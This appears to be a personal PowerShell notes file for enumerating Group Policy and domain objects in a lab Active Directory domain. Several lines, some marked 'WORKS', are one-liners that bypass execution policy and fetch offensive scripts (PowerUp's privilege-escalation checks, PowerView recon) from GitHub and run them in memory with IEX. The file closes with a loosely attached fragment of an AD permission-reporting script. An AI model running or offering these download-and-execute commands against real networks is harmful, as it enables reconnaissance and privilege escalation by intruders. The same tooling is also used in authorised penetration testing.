Get-DomainGPO

1. #Setup
2. #
3. #
4. https://github.com/FuzzySecurity/StandIn#list-gpos
5. C:\Users\win11user\Downloads\StandIn_v13_Net35_45> .\StandIn_v13_Net35.exe --gpo
6. #
7. #
8.  
9. # ensure IPv4 and IPv6 is on the joined computer pointing to AD
10. # Add-Computer -DomainName “Domain Name” -Credential “Domain Username”
11. #import-module ActiveDirectory
12. Get-WindowsCapability -Name RSAT* -Online | Select-Object -Property DisplayName, Stat
13. #Get-WindowsCapability -Name RSAT* -Online | Add-WindowsCapability –Online
14. Add-WindowsCapability –online –Name “Rsat.ActiveDirectory.DS-LDS.Tools~~~~0.0.1.0”
15. Add-WindowsCapability -Online -Name Rsat.GroupPolicy.Management.Tools~~~~0.0.1.0
16. # Get-GPOReport -All -Domain "corp.contoso.com" -Server "HYD-DC1" -ReportType XML -Path "C:\GPOReports\GPOReportsAll.xml"
17.  
18. #WORKSWORKSWORKSWORKS
19. powershell -nop -exec bypass -c "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/jessefmoore/PowerSploit/master/Privesc/PowerUp.ps1'); Invoke-AllChecks"
20.  
21. ###############################################################################################################
22. #WORKSWORKSWORKSWORKSWORKSWORKSWORKSWORKSWORKSWORKSWORKSWORKSWORKSWORKSWORKSWORKSWORKSWORKSWORKSWORKS##########
23. ###############################################################################################################
24. powershell -nop -exec bypass -c "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/BC-SECURITY/Empire/master/empire/server/data/module_source/situational_awareness/network/powerview.ps1'); Get-NetDomain -Domain pets.local"
25.  
26. #WWWWWWWWWWWWWWWWWh
27. powershell -nop -exec bypass -c "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/BC-SECURITY/Empire/master/empire/server/data/module_source/situational_awareness/network/powerview.ps1'); Get-NetGPO"
28.  
29. GOOOOOOOOOOOOOOOOOOOOOOOOD
30. powershell -nop -exec bypass -c "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/BC-SECURITY/Empire/master/empire/server/data/module_source/situational_awareness/network/powerview.ps1'); Get-NetDomain -Domain pets.local"
31.  
32.  
33. NNEEEEEEEEEEEEEEEEEEEEEEEEEEEEEWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWW
34. powershell -nop -exec bypass -c "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/ZeroDayLab/PowerSploit/master/Recon/PowerView.ps1'); Get-NetDomain -Domain pets.local"
35.  
36. powershell -nop -exec bypass -c "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/ZeroDayLab/PowerSploit/master/Recon/PowerView.ps1'); Get-NetGPO"
37.  
38.  
39.  
40. #Get-GPO -All -Domain "corp.contoso.com"
41. # Get-GPO -Domain pets.local -All
42. #powershell -nop -exec bypass -c "IEX (New-Object #Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/dev/Recon/PowerView.ps1'); Get-DomainGPO"
43. #
44. "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/BC-SECURITY/Empire/master/empire/server/data/module_source/situational_awareness/network/powerview.ps1'); Get-DomainGPO"
45. #
46. #"IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/BC-#SECURITY/Empire/master/empire/server/data/module_source/situational_awareness/network/powerview.ps1'); Get-DomainGPO | Get-DomainPolicy"
47. #
48. #
49. Write-Output "Gathering Domain Permissions for $Domain"
50. $ForestDomainObjectData = Get-ADObject $ADDomainInfo.DistinguishedName -Properties * -Server $DomainDC
51. $ForestDomainObjectSecurityData = $ForestDomainObjectData.nTSecurityDescriptor.Access
52. $ForestDomainObjectPermissions = @()
53. ForEach ($ForestDomainObjectSecurityDataItem in $ForestDomainObjectSecurityData)
54.  {
55.     $ObjectTypeName = Get-NameForGUID $ForestDomainObjectSecurityDataItem.ObjectType -ForestDNSName $ForestDNSName
56.     $InheritedObjectTypeName = Get-NameForGUID $ForestDomainObjectSecurityDataItem.InheritedObjectType -ForestDNSName $ForestDNSName
57.  
58.     $ForestDomainObjectSecurityDataItem | Add-Member -MemberType NoteProperty -Name Domain -Value $Domain -Force
59.     $ForestDomainObjectSecurityDataItem | Add-Member -MemberType NoteProperty -Name ObjectTypeName -Value $ObjectTypeName -Force
60.     $ForestDomainObjectSecurityDataItem | Add-Member -MemberType NoteProperty -Name InheritedObjectTypeName -Value $InheritedObjectTypeName -Force
61.  
62.     [array]$ForestDomainObjectPermissions += $ForestDomainObjectSecurityDataItem
63.  }
64. $ForestDomainObjectPermissionFile = $ReportDir + "\TrimarcADChecks-DomainRootPermissionReport-$Domain-$TimeVal.csv"
65. $ForestDomainObjectPermissions | Sort IdentityReference | Select IdentityReference,ActiveDirectoryRights,InheritedObjectTypeName,ObjectTypeName,`
66. InheritanceType,ObjectFlags,AccessControlType,IsInherited,InheritanceFlags,PropagationFlags,ObjectType,InheritedObjectType | `
67. Export-CSV $ForestDomainObjectPermissionFile -NoTypeInformation  
68.  
69. Write-Host "Active Directory Domain Permission report saved to the file $ForestDomainObjectPermissionFile" -Fore Cyan
70. Write-Host ""